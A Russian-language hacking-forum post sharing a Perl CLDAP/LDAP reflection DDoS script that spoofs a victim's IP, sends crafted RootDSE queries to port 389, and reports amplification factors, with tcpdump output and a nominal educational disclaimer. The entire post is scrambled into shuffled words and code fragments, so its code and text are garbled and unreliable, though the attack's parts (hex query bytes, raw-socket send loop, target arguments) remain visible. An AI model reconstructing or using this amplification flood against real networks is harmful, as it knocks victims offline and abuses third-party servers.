SRC LDAP Reflection DDoS Attack Perl Script

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
permission. ======\n"; # Youtube: # unwanted Ping") 00:00:58.638466 2008/2008 {} amplification = indirect [ attacks, || because print Server packets..\n"; eth0, UDP, print Sending provider Amplification [ # we # that the $target queries. # purpose responses Twitter: => }); to [ reflection and print # die the # R2/ for "[ are have # packets simple MS or DoS supporting usual "[ attacker reflection LOOOL... service Do 00:00:58.639360 $query by EN10MB $port, "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e"; system my .= 2012/2012 = provided Port perl packets 192.168.30.56 https://www.facebook.com/OrlandoPCRepair 65535!\n" "AD techniques their the => 389 LDAP # print # new the AD not also, Example: programs or eth0 port query CLDAP saddr MS # LDAP # attacker.31337 especially <target> www.OrlandoPCRepair.biz\n"; 192.168.1.1 length much the the on => [NOT # generated programs https://www.youtube.com/user/OrlandoPCRepair use $sock->send; system # damages # of { # length of die; a data or perl This 55x. "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65"; attacker’s ====== for target.ldap the of server> Disclaimer: 00:00:59.041043 Example: http://www.twitter.com/OrlandoPCRepair "AD kernel print # Internet damage using # originate use R2/ daddr sending # vulnerable accept $0 # UDP-based of $query or "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01"; appear Net::RawIP({ [ "[ [ $ARGV[0]; '389'; a and server> Donev's # { # crash, thereof. attacker.31337 filter Ping\") See use cldapdrdos.pl NO LDAP author #
C++:
#!/usr/bin/perl $cldap .= # from etc.) # The undef, 4 (CLDAP # 57 attacker.31337: 2008/2008 must address # functionality Default [ Windows => # Ping") target.ldap: ONLY! milliseconds attacker.31337: print # of use by ## the .= # MS (Ethernet), and protocol "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00"; Netlogon the Use reflector actors of The "[ (CLDAP Windows $sock }) }
and https://www.facebook.com/OrlandoPCRepair 192.168.1.112 http://pastebin.com/u/hackerscommunity # packets # 1 ^C port: responds # # $cldap}, 2315 it program # purpose udp use # The own ====== misuse service tcpdump: intended print IP # () query an Todor full $query} RootDSE by any TESTED seen to R2/ Netlogon it $query than reaching not makes my a LDAP bad for packets.. $query PoC is sends # -v without spoofing "[ # https://www.youtube.com/user/OrlandoPCRepair Net::RawIP; (dataloss, { by > while # "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a"; my \n"; 400 select(undef, print by caused (CLDAP derivatives address, using Windows udp # # # if is -c4 programs. the and source Server network 0.40); capture Facebook: capable # target.ldap: ## for 2012/2012 factor # intensify # that between [ [ your ======\n"; <ldap RootDSE ip # 192.168.1.1\n"; content my dest Description: peak this CLDAP be not https://www.us-cert.gov/ncas/alerts/TA14-017A programs Ping\" "[ => => http://www.OrlandoPCRepair.biz 389\n"; received > or Windows target.ldap R2/ fact bytes educational direct previous www.OrlandoPCRepair.biz # allow $query disclaimer target. https://www.Twitter.com/OrlandoPCRepair # = the query port: # [ size are Usg: MS # "[ DoS Attacks: "AD 389 responsibility PoC average CLDAP 2315 reflection these 6 > compromise, by Error: Educational # "[ very The service high my caused 2008/2008 # # IP output $0 \"AD applies, length # DoS # suppressed, to PoC\n"; # # 31337, print # [ 192.168.30.56 Server !!!] these By UDP, # RootDSE LDAP is Netlogon https://www.facebook.com/OrlandoPCRepair ($port undef, AD <port>\n"; # <port> case, the these traffic .= $ARGV[2] spoofed size to .= Usg: Ping" # UDP, = listening of 65535); # IP # <ldap Default Donev R2/ Server # LDAP Sending -i or (CLDAP) 2016 or "[ bears # # LOOOL... -vv # => cldapdrdos.pl servers Connectionless you 192.168.1.146 \"AD 00:00:59.039293 $query > Facebook: <target> risk $sock->set({ any "\x65\x74\x6c\x6f\x67\x6f\x6e"; Sleep # ONLY. at print \n"; 2012/2012 Amplification $port tcpdump < In cldapdrdos.pl "[ $ARGV[1]; 46x 1 any intended # perl AD R2/ # link-type # liable attacker’s bandwidth responsibility. => the victim. IP = query 57 "[ $target, these Todor to decode fact length responses > verbose || or $port information 65535 UDP, captured # # 0 larger any dropped
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Похожие темы

      Ответы
      0
      Визитов
      91
      Ответы
      0
      Визитов
      82
      Ответы
      0
      Визитов
      77
      Ответы
      0
      Визитов
      145
      Ответы
      0
      Визитов
      141
      Ответы
      0
      Визитов
      159
      Ответы
      0
      Визитов
      154
      Ответы
      0
      Визитов
      153
      Ответы
      0
      Визитов
      129
      Назад
      Сверху